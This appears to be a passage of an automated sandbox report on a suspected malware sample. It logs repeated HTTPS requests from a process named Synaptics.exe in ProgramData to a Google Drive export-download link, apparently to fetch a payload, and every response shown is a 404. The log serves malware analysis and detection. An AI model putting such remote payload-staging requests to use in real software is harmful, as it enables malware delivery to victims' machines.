                                                                                                                                                                                        2022-05-17 11:31:43 UTC343INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:43 UTC343INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        112192.168.2.349869142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:43 UTC343OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:43 UTC343INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:43 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nno7p0F6hK0MrbsPWaF66Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:43 UTC345INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 6f 32 6b 50 4f 75 54 34 4e 30 64 43 38 72 6f 44 43 67 65 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Wo2kPOuT4N0dC8roDCgeJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:43 UTC346INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:43 UTC346INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        113192.168.2.349871142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:44 UTC346OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:44 UTC346INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:44 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-6hynFQ8ihTuehd7Mt5XPzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:44 UTC348INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 4f 70 35 4c 65 47 46 6a 32 63 78 6e 73 64 49 62 6f 64 4f 71 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VOp5LeGFj2cxnsdIbodOqQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:44 UTC349INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:44 UTC350INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        114192.168.2.349872142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:44 UTC346OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:44 UTC350INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:44 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-puc0Y7teBKGrTWggy806bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:44 UTC351INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:44 UTC351INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 52 66 37 61 65 69 63 67 7a 75 37 71 74 36 69 51 65 76 41 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oRf7aeicgzu7qt6iQevA0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:44 UTC352INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:44 UTC353INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        115192.168.2.349874142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:44 UTC350OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:44 UTC353INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:44 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2W/lJBZL5JRrHG/V6CPymw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:44 UTC354INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:44 UTC354INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 71 45 75 4f 48 5a 31 4a 2b 59 6a 42 5a 36 6f 62 6c 6d 55 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jqEuOHZ1J+YjBZ6oblmU8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:44 UTC355INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:44 UTC356INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        116192.168.2.349875142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:44 UTC353OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:44 UTC356INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:44 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lkYuTXoDk4eaGN6d+EwXLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:44 UTC357INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 51 70 49 31 31 32 50 47 6b 6f 6d 4b 4d 2f 2b 76 5a 56 31 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7QpI112PGkomKM/+vZV1ZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:44 UTC358INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
